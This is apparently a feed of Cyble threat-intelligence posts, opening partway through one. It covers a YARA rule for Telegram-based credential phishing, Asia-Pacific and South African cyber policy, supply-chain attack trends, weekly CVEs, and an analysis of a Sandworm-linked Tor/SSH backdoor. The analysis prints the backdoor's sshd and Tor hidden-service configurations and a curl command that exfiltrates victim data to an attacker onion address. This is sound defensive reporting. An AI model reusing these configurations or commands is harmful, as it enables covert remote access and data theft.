• Hard-coded Telegram bot tokens and chat IDs inside the HTML/JS.
• Use of https[:]//api.telegram.org/bot endpoint in JavaScript.
• HTML that loads a blurred background invoice image and a modal overlay with Adobe branding.

Detection opportunities

Yara rule

rule HTML_Telegram_Credential_Phishing 
{ 
    meta: description = "Detects HTML-based Telegram credential phishing attempts that invoke the Telegram bot API to exfiltrate credentials" 
    author = "Cyble Research Labs" 
    date = "2025-11-04" 
    tlp = "AMBER" 
    severity = "critical"
    strings:
        $a = "api.telegram.org/bot"
        $b = "/sendMessage"
        $c = "type=\"password\""
        $d = "preventDefault()"
        $e = /[0-9]{9,10}:AA[A-Za-z0-9_-]{35}/
        $f = "api.ipify.org"
        $g = "Quotation Request"
        $h = "Invoice "

    condition:
        all of ($a, $b, $c, $d) and any of ($e, $f, $g, $h)
}

The post Multi-Brand themed Phishing Campaign Harvests Credentials via Telegram Bot API appeared first on Cyble.

Australia is using its collaborative approach to cybersecurity across the Asia-Pacific, with key leadership from Stephanie Crowe, Head of the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), and Jessica Hunter, the nation’s newly appointed Ambassador for Cyber Affairs and Critical Technology. 

Together, they are spearheading initiatives to enhance cyber resilience, share threat intelligence, and build technical capacity among regional partners through frameworks such as the Pacific Cyber Security Operations Network (PaCSON) and the Asia Pacific Computer Emergency Response Team (APCERT).  

A Collaborative Vision for Regional Cybersecurity 

Speaking on their shared mission, Crowe and Hunter outlined how their respective portfolios intersect to reinforce cybersecurity within the Asia-Pacific. 

“Hi, I’m Stephanie Crowe, Head of the Australian Cyber Security Centre at the Australian Signals Directorate,” Crowe began, introducing her role. 

“And I’m Jessica Hunter, Ambassador for Cyber Affairs and Critical Technology at the Department of Foreign Affairs and Trade,” added Hunter. “We work together to strengthen cybersecurity within the Asia-Pacific region.” 

Hunter explained that her role as Ambassador for Cyber Affairs and Critical Technology involves leading Australia’s international engagement in cyberspace and advancing national interests in emerging technologies. “I do this through building cyber capacity, uplifting crisis response practices, and increasing resilience across our region,” she said. 

Crowe described how the ACSC provides technical expertise and operational support. “Through the Australian Cyber Security Centre, the ASD shares cyber threat intelligence and supports capacity-building activities in Australia and with our neighbours in the Asia-Pacific,” she noted. 

Aligning with the Australian Cyber Security Strategy 

Both leaders denoted that their work underpins the Australian Cyber Security Strategy, which prioritizes international cooperation as a mechanism for strengthening collective resilience. 

“International collaboration gives us the best opportunity to leverage capability, expertise, partnerships, and threat visibility,” Crowe said. “By doing so, we can help our region uplift its cybersecurity and boost its capability.” 

Hunter added that cyberspace “is truly borderless,” requiring nations to work closely across the Pacific and beyond to ensure shared protection. “Cyber and critical technology affect all aspects of international relations,” she explained. “They underpin national security, the realization of human rights and freedoms, global economic prosperity, sustainable development, and international stability.” 

The $83.5 Million Cyber Program Commitment 

Australia’s efforts are supported through the Cyber and Critical Technology Cooperation Program, a federal initiative valued at $83.5 million. The program provides rapid assistance for digital incident response and long-term resilience building, particularly in Pacific and Southeast Asian nations. 

“This program reflects our commitment to supporting the resilience of our closest partners,” Hunter said. “It delivers on SHIELD Six of the Australian Government’s Cyber Security Strategy by strengthening international cooperation and preparedness.” 

Strengthening Regional Networks: PaCSON and APCERT 

A major component of Australia’s regional engagement is its leadership role within PaCSON and APCERT, two cornerstone networks facilitating operational collaboration across the Asia-Pacific. 

The Pacific Cyber Security Operations Network (PaCSON) unites cybersecurity and incident response experts from government agencies across the Pacific. It provides a structured way for countries to share information, coordinate incident responses, and develop consistent practices for managing cyber threats. 

Similarly, the Asia Pacific Computer Emergency Response Team (APCERT) connects cybersecurity teams throughout the wider region, promoting best practices and mutual support in the face of emerging digital risks. 

“By uplifting our cyber defences together, we are better positioned to respond collectively to cyber incidents,” Crowe said. “This work strengthens Australia and places the region in a better position to face evolving cyber challenges.” 

Information Sharing and Regional Resilience 

The ACSC uses intelligence gathered from incidents within Australia to inform its engagement with Pacific partners. This includes issuing alerts, publishing technical advisories, and sharing best-practice resources through the national platform cyber.gov.au, which provides materials in more than 25 languages. 

According to Crowe, this approach ensures that lessons learned domestically can directly benefit regional counterparts. “The ASD and ACSC’s advice helps to inform discussions and negotiations with our partners around cybersecurity awareness and uplift,” she said. 

Hunter underscored that such collaboration is essential in a rapidly evolving threat landscape. “A complex and evolving threat environment means that we need each other,” she stated. “No country can face these challenges alone.” 

Both leaders reiterated that cooperation among like-minded nations is critical to maintaining global trust and accountability. “We continue to join with international partners to uphold international law and impose costs on malicious actors that make cyberspace less safe,” Hunter said. “Collectively, we can strengthen our nations and our region’s cyber resilience by working together to share knowledge, resources, and best practices.” 

References: 

• https://www.cyber.gov.au/about-us/view-all-content/news/building-cyber-capability-and-resilience-across-the-asia-pacific-region 

• https://vimeo.com/1134039082?fl=pl&fe=ti 

The post Australia Strengthens Regional Cyber Partnerships to Bolster Security Across the Asia-Pacific  appeared first on Cyble.

South Africa took a major step toward modernizing governance and service delivery with the launch of MzansiXchange, a pilot project designed to enable secure and structured data exchange across government departments. The initiative, led by the National Treasury, allows public institutions to work more efficiently, using shared data to inform decisions and deliver better services. 

The MzansiXchange initiative aims to overcome long-standing challenges in South Africa’s public sector, including fragmented data systems, departmental silos, and limited interoperability. Rather than functioning as a single data repository, it acts as what National Treasury Director-General Dr Duncan Pieterse calls a “secure bridge” for data exchange between authorized government entities. 

“MzansiXchange is not a central data repository. It does not store any data,” Dr Pieterse explained at the pilot launch. “Instead, it acts as a structured and governed exchange that allows departments to retain ownership of their data while sharing it securely with other authorized entities when needed.” 

The Roadmap for Digital Transformation 

MzansiXchange forms one of the four pillars of the Roadmap for the Digital Transformation of Government, officially launched in May 2025. The other three pillars, digital identity, digital payments, and digital services, together form the foundation of South Africa’s digital public infrastructure. 

According to Dr Pieterse, the roadmap represents a joint effort between the National Treasury, the Presidency, and several other government departments as part of Operation Vulindlela Phase II. Its goal is to modernize public administration, enhance data-driven decision-making, and improve coordination across state institutions. 

Each pillar supports the others: while MzansiXchange focuses on data exchange, the MyMzansi initiative, the broader digital entry point for citizens, will integrate identity, payments, and service access into a unified platform. Together, they aim to create a government ecosystem that is more transparent, efficient, and responsive to public needs. 

Four Components of the MzansiXchange Platform 

The MzansiXchange pilot introduces four main components designed to meet different data-sharing needs within government: 

1. Regulation, Compliance, and Verification: Provides authorized entities with real-time access to identifiable data for verification and compliance purposes. 

2. Policy, Planning, and Research: Facilitates the bulk sharing of de-identified data for evidence-based policymaking and research. 

3. Operational Analytics: Enables departments to transfer both de-identified and identifiable data to support day-to-day service delivery. 

4. Open Access Data: Offers the public access to aggregated datasets, dashboards, and catalogues through secure digital channels. 

These components are underpinned by strict governance frameworks, standardized data protocols, and legal instruments such as Memoranda of Understanding (MoUs) and Service Level Agreements (SLAs). This ensures that all data exchange within the system remains compliant, transparent, and secure. 

Building on a Foundation of Secure Data Use 

MzansiXchange builds on existing National Treasury projects such as the National Treasury Secure Data Facility (NT-SDF) and Spatial Economic Activity Data South Africa (SEAD-SA). These initiatives have already demonstrated the benefits of using anonymized administrative data to inform policy and planning. 

For over a decade, the NT-SDF has handled anonymized tax records for policy analysis and program evaluation, including assessments of firm-level productivity and government incentives. The spatialized tax data generated through this work enables provinces and municipalities to understand local economic trends and allocate resources more effectively. 

Dr Pieterse highlighted that South Africa is one of the few countries globally to make such micro-level administrative data available for research, underscoring the nation’s commitment to transparency and innovation. Lessons from these projects — including those related to system security, collaboration, and trust, have directly informed the design and governance of MzansiXchange. 

Learning from Global Examples 

While tailored to South Africa’s specific needs, MzansiXchange draws inspiration from successful international models. The National Treasury team consulted countries such as Estonia, India, Benin, Kazakhstan, and the Dominican Republic, all of which have implemented national data exchange frameworks. 

Brazil, for example, estimated savings of more than R4 billion in 2023 through its national data exchange infrastructure, highlighting the potential economic impact of secure and interoperable digital systems. 

The pilot phase of MzansiXchange, which will run for one year, is being implemented in collaboration with multiple departments and research institutions. Participants include Statistics South Africa, the Department of Home Affairs, the Department of Basic Education, the Department of Agriculture, Land Reform and Rural Development, the South African Revenue Service, and the South African Social Security Agency, among others. 

The project also benefits from the technical expertise of Open Cities Lab and the support of international development partners such as the State Secretariat for Economic Affairs (SECO), the UK Foreign, Commonwealth and Development Office (FCDO), and the Gates Foundation. 

A Platform for Transformation 

At the launch event, Dr Pieterse described MzansiXchange as a “platform for collaboration, innovation, and transformation,” emphasizing that its success depends on collective commitment. 

“MzansiXchange is a national commitment to harnessing data for the public good,” he said. “Its success depends on how each department integrates and fully leverages its potential. To succeed, we must build trust — between departments, in the system, and with the public.” 

MzansiXchange’s architecture, built using X-Road technology, provides flexibility and resilience while supporting harmonized standards and long-term sustainability. It is designed to evolve as South Africa’s digital ecosystem matures, ultimately enabling a more connected and data-smart government. 

References: 

• https://www.gov.za/news/speeches/director-general-duncan-pieterse-mzansixchange-pilot-launch-09-oct-2025 

The post South Africa Launches Pilot for Secure Data Exchange Among Government Agencies  appeared first on Cyble.

Software supply chain attacks hit a new record in October that was more than 30% higher than the previous record set in April 2025. 

Cyble’s data – based on attacks claimed by threat actors on dark web data leak sites – shows that threat actors claimed 41 supply chain attacks in October, 10 more than the previous high seen in April. 

Supply chain attacks have remained elevated since April, averaging more than 28 a month since then, a rate that is more than twice as high as the 13 attacks per month seen between early 2024 and March 2025 (chart below). 

A combination of critical and zero-day IT vulnerabilities and threat actors actively targeting SaaS and IT service providers have been the primary drivers of the recent surge in supply chain attacks, and the sustained increase suggests that the risk of supply chain attacks may remain elevated going forward. Cloud security threats and AI-based phishing campaigns have also played a role in the growing number of supply chain incidents. 

Every one of the 24 sectors tracked by Cyble has been hit by a supply chain incident this year. Because of the rich target they represent and their downstream customer reach, IT and IT services companies have been by far the most targeted, with 107 supply chain attacks so far this year. Financial services, transportation, technology, and government have also been hit with much greater than average frequency (chart below). 

Recent Significant Supply Chain Attacks 

Qilin and Akira have been the top two ransomware groups in 2025, and both have also claimed an above-average share of supply chain attacks. 

Akira recently claimed responsibility for a cyberattack targeting a major open-source software project. The group claims to possess 23GB of data, including sensitive employee information as well as financial documents, internal confidential files, and reports related to software issues and internal operations. 

Akira also claimed multiple attacks on IT service providers, including a company that develops software solutions for government and law enforcement agencies, a provider of compliance and environmental data management software for industrial and energy clients, and a U.S.-based company providing IT, cybersecurity, and consulting solutions for government, intelligence, and defense sectors. In the latter case, the group claims to possess more than 19GB of data, including financial records, sensitive employee and customer data, confidential documents, NDAs, and other files containing personal and corporate data. 

Qilin claimed responsibility for breaching a U.S.-based financial technology company that provides integrated software and services for payment processing, transaction management, and financial infrastructure solutions. Stolen data allegedly includes confidential hardening reports, internal SharePoint directories, and a list of IT infrastructure employees from a major financial services company. 

Qilin also claimed an attack on a U.S.-based company providing technology solutions for law enforcement, criminal justice, public safety, and security sector, and source code for proprietary software products was among the allegedly stolen data, in addition to accounting and HR data and client payment information from various law enforcement agencies. 

Qilin claimed attacks on three U.S. energy cooperatives, including the theft of project information, obsolescence equipment details, contractual agreements with U.S. government entities, and customer billing information. 

Another claimed Qilin breach involved a U.S.-based cybersecurity and cloud services provider offering IT infrastructure, managed services, and compliance solutions for healthcare and dental organizations. The threat actors claimed they gained access to downstream customer environments through clear-text credentials stored in Word and Excel documents hosted on the company’s systems. The stolen data reportedly includes customers’ personal information, financial records, and medical documentation. Posted samples include unencrypted passwords from client systems, financial documents, and medical reports. 

A newly identified ransomware group, Kyber, leaked data allegedly stolen from a major U.S.-based defense and aerospace contractor that provides communication, surveillance, and electronic warfare systems. The group leaked over 141GB of data consisting of project files, internal builds, databases, and backup archives. 

The BlackShrantac hacking group claimed responsibility for a breach of a South Korean cybersecurity and physical security services provider. According to the hacking group, approximately 24GB of data was stolen, containing customer information and requirements, network and infrastructure data, HR and payroll data, e-commerce information, and cybersecurity technical documentation, including website source code, API keys, and configuration files. To substantiate their claims, BlackShrantac released several sample files, which appear to show access to internal documentation, technical blueprints, Excel sheets with configuration details, and other sensitive company data. 

The Cl0p ransomware group claimed several victims from its exploitation of Oracle E-Business Suite vulnerabilities, including a major global energy technology company and a major U.S. university. 

The threat group Crimson Collective claimed to have compromised a GitLab instance of a major U.S. technology provider, including the theft of 800 Customer Engagement Reports. The threat actors allegedly gained access to a client infrastructure using credentials and tokens found within the stolen repositories. 

Protecting Against Supply Chain Attacks 

Protecting against software supply chain attacks can be challenging because these partners and suppliers are, by nature, trusted, but security audits and assessing third-party risk should become standard cybersecurity practices. 

Organizations should also build in controls and resilience wherever possible to limit the extent of any attacks. Such controls include: 

• Network microsegmentation 

• Strong access controls, allowing no more access than is required, with frequent verification 

• A strong source of user identity and authentication, including multi-factor authentication and biometrics, and machine authentication with device compliance and health checks 

• Encryption of data at rest and in transit 

• Ransomware-resistant backups that are immutable, air-gapped, and isolated as much as possible  

• Honeypots that lure attackers to fake assets for early breach detection 

• Proper configuration of API and cloud service connections 

• Monitoring for unusual activity with SIEM, Active Directory monitoring, and data loss prevention (DLP) tools 

• Routinely assessing and confirming controls through audits, vulnerability scanning, and penetration tests 

The most effective place to control software supply chain risks is in the continuous integration and development (CI/CD) process, so carefully vetting partners and suppliers and requiring good security controls in contracts are essential for improving third-party security. Services like Cyble’s third-party risk intelligence can help you get started on this process. By making security a buying criterion, vendors will be more likely to respond with better security controls and documentation. 

The post Software Supply Chain Attacks Surge to Record High in October 2025 appeared first on Cyble.

Cyble Vulnerability Intelligence researchers tracked 1,128 vulnerabilities in the last week, more than 138 already have a publicly available Proof-of-Concept (PoC), significantly raising the chances of real-world attacks. 

A total of 67 vulnerabilities were rated as critical under the CVSS v3.1 scoring system, while 22 received a critical severity rating based on the newer CVSS v4.0 scoring system. 

Here are some of the IT and ICS vulnerabilities flagged by Cyble threat intelligence researchers in recent reports to clients. 

The Week’s Top IT Vulnerabilities 

CVE-2025-55754 is an Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Successful exploitation could potentially lead to indirect administrative command execution through console manipulation, risking system integrity and confidentiality if administrators are tricked into executing malicious commands. 

CVE-2025-59287 continues to attract the interest of threat actors on underground forums monitored by Cyble, and last week CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and issued a separate alert on the Microsoft out-of-band security update. The critical remote code execution (RCE) vulnerability in Microsoft Windows Server Update Services (WSUS) could allow unauthenticated attackers to execute arbitrary code remotely by exploiting publicly accessible WSUS servers on default TCP ports, potentially enabling lateral movement within enterprise environments. 

Other vulnerabilities added to the CISA KEV catalog in the last week include: 

• CVE-2025-54236, also known as "SessionReaper," is a critical vulnerability affecting Adobe Commerce and Magento Open Source platforms. The flaw stems from improper input validation in the Commerce REST API, potentially allowing remote unauthenticated attackers to hijack customer accounts and, under some configurations, achieve remote code execution (RCE). 

• CVE-2025-41244, a local privilege escalation vulnerability affecting VMware Aria Operations and VMware Tools. A local threat actor with non-administrative privileges, with access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled, could potentially exploit the vulnerability to escalate privileges to root on the same VM. 

• CVE-2025-24893, a code injection vulnerability affecting the XWiki Platform. Any guest can perform arbitrary remote code execution through a request to ‘SolrSearch,’ impacting the confidentiality, integrity, and availability of the entire XWiki installation. Cyble first detected attack attempts on the vulnerability in March. 

One of the week’s highest-rated vulnerabilities is, fortunately, one that was fixed for users. CVE-2025-59503 is a 9.9-rated Server-Side Request Forgery (SSRF) vulnerability affecting the Microsoft Azure Compute Resource Provider, specifically the Azure Compute Gallery, that could have allowed an authorized attacker to perform SSRF attacks. The issue has been fixed by Microsoft, which had not detected any attacks on the vulnerability as of the time of publication. 

CVE-2025-55315 is generating significant interest in open-source communities. The 9.9-rated vulnerability in ASP.NET Core, specifically in the Kestrel web server component, involves an inconsistent interpretation of HTTP requests, leading to HTTP request/response smuggling. This flaw could allow an authorized attacker to bypass security features over a network by smuggling an extra HTTP request inside another, potentially enabling actions that would normally require authentication. 

Vulnerabilities Under Discussion on Underground Forums 

Cyble dark web researchers observed threat actors on the dark web and underground forums discussing weaponizing multiple vulnerabilities. They include: 

CVE-2025-61984: A vulnerability in OpenSSH (versions prior to 10.1) related to command injection via the ProxyCommand feature when an attacker is able to supply a specially crafted username containing control characters (such as a newline followed by a payload). This could lead to remote code execution on the client system in a specific scenario. 

CVE-2025-40778: A high-severity vulnerability affecting BIND 9 DNS resolvers, widely used open-source DNS software. The flaw arises because BIND 9 is too lenient under certain conditions when accepting records in DNS responses, potentially allowing remote, unauthenticated attackers to inject forged DNS records into the resolver's cache via cache poisoning attacks. This could enable attackers to redirect Internet traffic to malicious sites, distribute malware, intercept network traffic, or disrupt services by supplying attacker-controlled DNS responses. 

CVE-2025-30247: A critical OS command injection vulnerability affecting Western Digital My Cloud firmware prior to 5.31.108 on NAS platforms. The vulnerability could allow remote attackers to execute arbitrary system commands via a specially crafted HTTP POST request to the device's web interface, without requiring authentication or user interaction. 

CVE-2025-9242: A critical out-of-bounds write vulnerability affecting WatchGuard Fireware OS, specifically the iked process that handles IKEv2 VPN services. Successful exploitation could allow a remote, unauthenticated attacker to execute arbitrary code on vulnerable devices, potentially leading to full system compromise. 

CVE-2025-49844: Also known as "RediShell," a critical remote code execution (RCE) vulnerability in the Redis in-memory data store. It is a use-after-free memory corruption bug affecting Redis versions with Lua scripting (up to version 8.2.1). This vulnerability could allow an authenticated user to send a specially crafted Lua script that manipulates the garbage collector and triggers a use-after-free condition, potentially enabling the attacker to escape the Lua sandbox and execute arbitrary native code on the host system. 

ICS Vulnerabilities 

Cyble vulnerability researchers also flagged three industrial control system (ICS) vulnerabilities at risk of exploitation. They include: 

CVE-2025-9574, a 9.9-rated Missing Authentication for Critical Function vulnerability affecting ASKI Energy’s ALS-mini-s4 IP (serial number from 2000 to 5166) and ALS-mini-s8 IP (serial number from 2000 to 5166). Successful exploitation of the vulnerability could allow an attacker to gain full control over the device. 

CVE-2025-58428, a Command Injection vulnerability affecting Veeder-Root TLS4B versions prior to 11.A. The 9.9-rated flaw could allow an attacker to achieve remote command execution, full shell access, and potential lateral movement within the network. 

CVE-2024-11737, a 9.3-rated Improper Input Validation vulnerability affecting Schneider Electric Modicon Controllers M241 (versions prior to 5.2.11.29), Modicon Controllers M251 (versions prior to 5.2.11.29), Modicon Controllers M258 (versions prior to 5.0.4.19), and Modicon Controllers LMC058 (versions prior to 5.0.4.19). The flaw could allow an attacker to achieve remote command execution, full shell access, and potential lateral movement within the network. 

Conclusion 

The high number of critical and exploited vulnerabilities this week highlights the need for security teams to be able to respond with rapid, well-targeted actions to successfully defend IT and critical infrastructure. A risk-based vulnerability management program should be at the heart of those defensive efforts. 

Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets; removing or protecting web-facing assets; Zero-Trust access principles; ransomware-resistant backups; hardened endpoints, infrastructure, and configurations; network, endpoint, and cloud monitoring; and well-rehearsed incident response plans. 

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. 

The post The Week in Vulnerabilities: Cyble Urges Apache, Microsoft Fixes appeared first on Cyble.

Executive Summary

In October 2025, Cyble Research and Intelligence Labs (CRIL) identified malware that distributed a weaponized ZIP archive masquerading as a military document titled "ТЛГ на убытие на переподготовку.pdf" (TLG for departure for retraining.pdf).  

Notably, the attack utilized a Belarusian military lure document targeting Special Operations Command personnel specializing in UAV/Drone operations, suggesting intelligence collection operations focused on regional military capabilities.

This multi-stage attack employs advanced evasion techniques, including double file extensions, anti-sandbox checks, and obfuscated PowerShell execution, to establish persistent backdoor access on targeted systems. The malware deploys a complex infrastructure that combines OpenSSH for Windows with a customized Tor hidden service, featuring obfs4 traffic obfuscation.

This provides threat actors with anonymous remote access via SSH, RDP, SFTP, and SMB protocols. The infection chain, shown in Figure 1 below, outlines the stages of the attack.

At the time of this writing, CRIL successfully connected via SSH to confirm the backdoor functionality. However, no secondary payloads or post-exploitation actions were seen.

CRIL assesses with moderate confidence that this October 2025 sample has similarities with the December 2024 Army+ campaign attributed to UAC-0125/Sandworm (APT44).

Key Takeaways

• This attack uses nested ZIP archives, LNK file disguises, and anti-sandbox checks to bypass automated detection systems. The malware validates system characteristics before execution, terminating in analysis environments while proceeding on genuine user machines.
• The implementation of advanced pluggable transport effectively hides Tor traffic as normal network activity, making detection significantly more challenging. This represents a major evolution from standard Tor protocols used in previous campaigns.
• Attackers access SSH, RDP, SFTP, and SMB via concealed Tor services, enabling full system control while preserving anonymity. All communications are directed through anonymous addresses using pre-installed cryptographic keys.
• The lure document targets Belarusian Air Force drone experts, suggesting intelligence gathering on regional UAV capabilities in the region or a potential false flag to obscure attribution.
• The TTPs used in this attack closely align with those of Sandworm (alias APT44/UAC-UAC-0125), a Russian-linked APT. However, since no targeting pattern has yet been observed, we cannot positively attribute it with high confidence at this stage.

Threat Attribution

The broader context of this attack aligns with intelligence reporting from Ukraine's CERT-UA and SSSCIP, which documented over 3,000 cyber incidents in the first half of 2025, many of which leveraged AI-generated phishing content and increasingly sophisticated malware. Given the source and the phrasing, it is unclear and unlikely at this stage to presume that this attack is targeting Russia or Belarus.

Based on tactical patterns, overlapping infrastructure, and its evolution from the December 2024 Army+ campaign, it demonstrates the continuous improvement of proven techniques used by Sandworm. The persistent targeting of military units also aligns with this campaign.

To offset this, the alignment of TTPs is in sync with what Sandworm uses, specifically Unit 74455. Since 2013, it has conducted numerous cyberattacks against Ukraine's military and critical infrastructure. Key operations include the BlackEnergy attacks, which resulted in power outages in 2015; the large-scale NotPetya malware outbreak in 2017; and the 2023 breach of Kyivstar, Ukraine's largest telecommunications provider.

The December 2024 Army+ fake installer campaign is a direct precursor to this example, demonstrating Sandworm's methodical targeting strategy. It involved using malicious NSIS installers spread through fake Cloudflare Workers sites, which deployed PowerShell scripts to create hidden SSH access via the Tor network.

This particular threat has tactical improvements over Sandworm's TTPs, indicating ongoing operational growth: the addition of obfs4 (obfuscated bridge protocol) to enhance secure Tor communication, the implementation of scheduled tasks for dependable persistence, and the strategic use of pre-generated RSA keys instead of generating them on the spot to minimize detection risk and operational footprint. These updates demonstrate the TA's (Threat Actor) adaptability and its commitment to enhancing operational security in response to defensive actions and evolving detection capabilities.

CRIL assesses with moderate confidence that this October 2025 sample has similarities with the December 2024 Army+ campaign attributed to UAC-0125/Sandworm (APT44).

Technical Analysis

The malicious ZIP archive file named "ТЛГ на убытие на переподготовку.pdf” employs a double extension technique to masquerade as a legitimate PDF document, exploiting user trust in common file formats to initiate the attack chain.

Upon extraction of the ZIP archive, the victim is presented with two components: an LNK (Windows shortcut) file bearing the same Russian filename "ТЛГ на убытие на переподготовку.pdf" and a hidden directory named "FOUND.000". (See Figure 2)

This hidden folder contains an additional archive file titled "persistentHandlerHashingEncodingScalable.zip", which is crucial in the subsequent execution stages.

LNK Execution Chain

When the victim attempts to open what appears to be a PDF document, the LNK file triggers instead, executing embedded PowerShell commands stored within its target section. (See Figure 3)

This social engineering technique leverages the user's expectation of viewing a legitimate military document while covertly initiating the malicious payload.

PowerShell Execution

The PowerShell code embedded within the LNK file performs several critical operations. First, it utilizes the Expand-Archive command to extract the contents of "persistentHandlerHashingEncodingScalable.zip" from the Downloads folder into the %appdata%\logicpro directory. Following successful extraction, the script retrieves content from a file named "adaptiveOptimizingDeployingDecodingEncrypting" located within the newly created directory structure.

Finally, this retrieved content is executed through an additional hidden PowerShell instance, effectively establishing the next stage of the attack while maintaining stealth through obfuscated execution methods. (see Figure 4)

Automated analysis check:

The second-stage PowerShell script incorporates simple anti-analysis checks designed to evade detection in sandbox and automated analysis environments. The malware verifies two specific system conditions before proceeding with the infection chain: it confirms that the number of recent LNK files present on the system is greater than or equal to 10 and validates that the current process count exceeds or equals 50.

These checks serve as environmental awareness mechanisms, as sandbox environments typically exhibit fewer user-generated shortcuts and reduced process activity compared to genuine user workstations. If either condition fails to meet the threshold, the script terminates execution, effectively bypassing automated malware analysis systems. (See Figure 5)

Upon successful validation of the environmental checks, the PowerShell script retrieves and displays a PDF document stored within the %appdata%\logicpro directory. This document serves as a decoy, maintaining the illusion of legitimacy while malicious operations proceed in the background.

Lure Document Analysis and Target Profile

The decoy PDF reveals a specific targeting strategy focused on the Belarusian military sector. The document’s potential targets are likely personnel within the Special Operations Command of the Belarusian Air Force (CCO BC) who possess operational expertise in unmanned aerial vehicle (UAV) or drone operations. However, at the time of publication, we cannot be sure.  (see Figure 5)

Background Execution and Persistence

While the victim reviews the decoy PDF document, the malware initiates its primary attack sequence in the background. The threat actor establishes persistence through a sophisticated scheduled task mechanism designed to ensure continuous access to the compromised system.

Scheduled Task Implementation

The PowerShell script leverages the Register-ScheduledTask cmdlet to create persistence, utilizing an XML configuration file extracted from the initial ZIP archive. This scheduled task is configured with dual trigger mechanisms: it executes immediately upon user logon and subsequently runs at regular intervals every day at 10:21 AM UTC.

Following registration, the script immediately initiates the scheduled task to begin operations without requiring a system restart.

Task 1: SSH Service Deployment

The first scheduled task executes the following command, as shown below (see Figure 7)

Despite its benign filename suggesting legitimate software, `githubdesktop.exe` is actually the OpenSSH for Windows binary, digitally signed by Microsoft to evade security detection. The executable launches with the configuration file `controllerGatewayEncrypting` as a parameter, establishing an SSH service that listens on port 20321 bound to localhost (127.0.0.1).

The configuration implements strict security measures by disabling password authentication entirely, permitting only RSA key-based authentication for remote access.

SSH Configuration:

The configuration file `controllerGatewayEncrypting` contains the following critical parameters:

Port 20321

ListenAddress 127.0.0.1

HostKey redundantOptimizingInstanceVariableLogging

PubkeyAuthentication yes

PasswordAuthentication no

AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing

Subsystem sftp AppData\Roaming\logicpro\ebay.exe

This configuration restricts authentication to pre-deployed authorized keys stored in `redundantExecutingContainerIndexing`, ensuring that only the threat actor possessing the corresponding private key can establish SSH connections. Additionally, the SFTP subsystem is configured using `ebay.exe`, enabling file transfer capabilities for data exfiltration.

Task 2: Tor Network Implementation with Obfs4 Bridge

The second scheduled task establishes anonymous network communication through the Tor network (see Figure 8)

The `pinterest.exe` binary is a customized Tor executable that launches with the configuration file `pipelineClusterDeployingCluster`. This configuration establishes a Tor hidden service (.onion address). It implements port forwarding for multiple critical Windows services, enabling the threat actor to access various system resources through the anonymized Tor network.

Tor Hidden Service Configuration:

HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/"

HiddenServicePort 20322 127.0.0.1:20321    # SSH service

HiddenServicePort 11435 127.0.0.1:445      # SMB/File sharing

HiddenServicePort 13893 127.0.0.1:3389     # RDP - Remote Desktop Protocol

HiddenServicePort 12192 127.0.0.1:12191   

HiddenServicePort 14763 127.0.0.1:14762

GeoIPFile geoip

GeoIPv6File geoip6

Obfs4 Transport Layer for Traffic Obfuscation:

A critical enhancement in this attack is the implementation of obfs4 (obfuscation version 4) pluggable transport, representing a significant evolution from the December 2024 Army+ campaign. The configuration includes:

ClientTransportPlugin obfs4 exec confluence.exe

The obfs4 protocol disguises Tor traffic as innocuous network communications, significantly complicating network-based detection efforts. The confluence.exe executable handles the obfs4 transport layer, while two bridge relays located at 77.20.116.133:8080 and 156.67.24.239:33333 provide entry points into the Tor network. The inclusion of GeoIP databases enables geographic routing analysis and potential refinement of targeting.

Command and Control

Following the successful establishment of the hidden service, the malware constructs a unique .onion URL hostname identifying the compromised system. This hostname is then exfiltrated to the threat actor's command-and-control infrastructure using the following curl command:

curl --retry 1000 --retry-delay 3 --retry-all-errors -m 120 -s

     --socks5-hostname localhost:9050 <Attacker’s onion url>/lst?q=<host name>:<victim’s tor domain>:3-yeeiyem

This command transmits critical information, including the victim's username, the newly generated Tor hidden service hostname (taibdsgqlwvnizgipp4sn7xee72qys3pufih3rjzhx3e5b5t245kafid.onion), and a campaign identifier.

The curl command is configured with aggressive retry logic (1000 attempts with 3-second delays) to ensure reliable delivery even under adverse network conditions. All traffic is routed through the local Tor SOCKS5 proxy on port 9050 to maintain operational security.

Attacker Command and Control Operations

Upon receiving the victim's .onion URL through the command-and-control channel, the threat actor gains comprehensive remote access capabilities to the compromised system. The attack infrastructure utilizes pre-generated RSA private keys that were embedded within the original malicious archive, eliminating the need for on-the-fly key generation and reducing the operational footprint that could trigger detection mechanisms. (see Figure 9 and Figure 10)

PuTTY was configured with the localhost SOCKS5 proxy settings, and the extracted RSA private key was converted to PPK format using PuTTYgen for authentication. (see Figure 10)

In our simulation, SSH connectivity was successfully established to the test system after completing the proxy and authentication setup. The connection provided full command-line access through the Tor-anonymized channel, confirming the backdoor's operational functionality. Figure 11 shows the active SSH session, demonstrating how threat actors achieve remote access to compromised systems.

Remote Desktop Protocol (RDP): The threat actor can establish graphical remote desktop sessions by connecting to port 13893 on the victim's .onion address, which forwards to the local RDP service on port 3389. This provides full interactive desktop access for manual operations.

Secure File Transfer Protocol (SFTP): The exposed SFTP subsystem enables bidirectional file transfer capabilities, allowing the threat actor to exfiltrate sensitive documents, deploy additional malware payloads, or modify system configurations without detection.

Server Message Block (SMB) File Sharing: Access to port 11435 (forwarding to local SMB port 445) enables network file share enumeration and access, facilitating lateral movement within networked environments and large-scale data exfiltration operations.

This multi-protocol access framework provides the threat actor with flexible operational capabilities tailored to specific mission objectives, whether conducting intelligence collection, establishing persistence for long-term access, or preparing for destructive operations.

The backdoor was tested by establishing a controlled SSH connection using the extracted RSA keys and setting up a Tor SOCKS5 proxy. During monitoring, no secondary payloads, post-exploitation commands, or lateral movement were detected, indicating the operation is likely still in reconnaissance or surveillance before active exploitation.

Conclusion

This October 2025 attack showcases the ongoing evolution of state-sponsored cyber espionage targeting military personnel in Eastern Europe. The sophisticated, multi-step infection process combines social engineering with technical countermeasures and relies on an anonymous command-and-control infrastructure. This demonstrates Sandworm's ongoing enhancements and commitment to maintaining covert access within military networks.

